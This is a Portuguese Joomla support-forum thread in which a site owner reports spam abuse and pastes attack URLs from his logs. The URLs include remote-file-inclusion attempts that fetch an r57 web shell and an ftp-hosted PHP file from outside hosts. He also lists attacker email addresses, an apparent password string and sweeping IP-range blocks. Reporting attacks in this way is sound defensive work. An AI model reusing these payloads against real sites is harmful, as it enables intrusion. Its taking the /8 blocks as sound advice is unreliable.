Joomla Enviando Spam com falhas em segurança

Moderator: ariadneduvessa

Post Reply
Neemias
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Tue May 12, 2015 11:06 am

Joomla Enviando Spam com falhas em segurança

Post by Neemias » Tue May 12, 2015 11:23 am

Olá a Todos,

Venho acompanhando meus sites e tenho encontrado vários ataques para uso da minha banda para enviar e-mail. O Motivo é a falha de segurança com o "envie um e-mail" que desabilitei e o módulo de envio de e-mail, Fiquei rastreando e cheguei num IP que pertencia a uma Empresa de Crédito BMG de São Paulo. Então suponho que eles usem um sistema de envio que usa essa falha. Tem ataque mais sérios tentando roubar senhas e baixar o banco de Dados do Joomla. Tive também que bloquear uns IPS que ficavam fazendo downloads de gigas do mesmo arquivo para quebrar o site. A solução, em resumo foi colocar um script PHP para barrar determinadas palavras, bloquear vários IPs (principalmente o 66.*.*.*). Vejam alguns dados da invasão:

h t t p:/ /meusite. o r g . b r/ /administrator/components/com_simplephotogallery/lib/uploadFile. p h p
h t t p:/ /meusite. o r g . b r/?option=com_mailto&tmpl=component&link=9869b24c510d1d68e83b7b856343927de6ed5631
h t t p:/ /meusite. o r g . b r/index. p h p/component/users/?task=registration.register
h t t p:/ /meusite. o r g . b r/ /administrator/index. p h p
h t t p:/ /meusite. o r g . b r/bitrix/admin/index. p h p?lang=en
h t t p:/ /meusite. o r g . b r/robots.txt
h t t p:/ /meusite. o r g . b r/?option=com_mailto&tmpl=component&link=9869b24c510d1d68e83b7b856343927de6ed5631
h t t p:/ /fisioreeducar.com.br/plugins/system/t3/base/js/responsive.js
h t t p:/ /meusite. o r g . b r/index. p h p/joomla-pages-ii/user-registration.html?task=registration.register
h t t p:/ /meusite. o r g . b r/index. p h p?format=feed&type=rss
h t t p:/ /meusite. o r g . b r/@pg=225969
h t t p:/ /meusite. o r g . b r/wp-login. p h p
h t t p:/ /meusite. o r g . b r/index. p h p?limitstart=33
h t t p:/ /meusite. o r g . b r/media/system/js/caption.js
h t t p:/ /best-seo-offer.com/try. p h p?u=h t t p:/ /meusite. o r g . b r
h t t p:/ /meusite. o r g . b r/index. p h p?format=feed&type=rss
h t t p:/ /meusite. o r g . b r/ContentUpload/admin/freeASPUpload/uploadTester.asp
h t t p:/ /meusite. o r g . b r/FreeASPUpload/uploadTester.asp
h t t p:/ /meusite. o r g . b r/asp/freeupload/uploadTester.asp
h t t p:/ /meusite. o r g . b r/fortbildning/test/uploadTester.asp
h t t p:/ /meusite. o r g . b r/Includes/Advertiser/uploadTester.asp
h t t p:/ /meusite. o r g . b r/x. p h p
h t t p:/ /www.meusite. o r g . b r:2082/cpsess6047857031/awstats.pl?config=actarj.com.br&ssl=&lang=pt&framename=mainright
h t t p:/ /musicetvideo.free.fr/images/stories/r57.txttxt

h t t p:/ /www.meusite. o r g . b r:2082/index. p h p?view=h t t p:/ /musicetvideo.free.fr/images/stories/r57.txt?
h t t p:/ /www.meusite. o r g . b r:2082/index. p h p?option=ftp:/ /smartovod:smartovod@smartovod.info/x. p h p?


somentelinks2@gmail.com
obamathe2014@gmail.com
gordimfiles@gmail.com
zenek.bloger@go2.pl
joomlas.sites@gmail.com

nh1H87neoO folke.asell@gmail.com



78.0.0.0/8 78.0.0.0 - 78.255.255.255

66.0.0.0/8 66.0.0.0 - 66.255.255.255

177.98.0.0/16 177.98.0.0 - 177.98.255.255

162.216.0.0/16 162.216.0.0 - 162.216.255.255

147.0.0.0/8 147.0.0.0 - 147.255.255.255

199.48.0.0/16 199.48.0.0 - 199.48.255.255

68.0.0.0/8 68.0.0.0 - 68.255.255.255

46.0.0.0/8 46.0.0.0 - 46.255.255.255

157.0.0.0/8 157.0.0.0 - 157.255.255.255

41.0.0.0/8

130.0.0.0/8 130.0.0.0 - 130.255.255.255

185.0.0.0/8 185.0.0.0 - 185.255.255.255

131.0.0.0/8 131.0.0.0 - 131.255.255.255

94.0.0.0/8 94.0.0.0 - 94.255.255.255

207.0.0.0/8 207.0.0.0 - 207.255.255.255

54.0.0.0/8

User avatar
djfeliz
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Jul 04, 2009 5:37 pm
Location: Poços de Caldas - MG

Re: Joomla Enviando Spam com falhas em segurança

Post by djfeliz » Tue May 12, 2015 11:06 pm

Não sei bem se é falha de segurança do Joomla, ou de algum componente ou mesmo alguma extensão que você instalou. Em todo o caso, é sempre bom fazer atualização do Joomla! para a última versão disponibilizada, neste caso, é Joomla! 3.4.1
Mas também, pode ser falha de segurança do servidor de hospedagem.

User avatar
ariadneduvessa
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 183
Joined: Thu Oct 15, 2009 3:17 pm
Location: Brazil / RJ
Contact:

Re: Joomla Enviando Spam com falhas em segurança

Post by ariadneduvessa » Sat Apr 02, 2016 5:50 pm

Conseguiu saber do que se tratava, Neemias?

Era algo no Joomla (versão desatualizada, extensões?) ou o servidor de hospedagem com alguma brecha, enchendo sua instalação de worms?
Moderator of pt-BR Joomla Official Forum
Personal Joomla Blog ariadnepinheiro.joomla.com
Maintainer of JUG Rio de Janeiro - joomlariodejaneiro.com.br
Owner of Joomla Brasil - joomla.com.br


Post Reply

Return to “Segurança”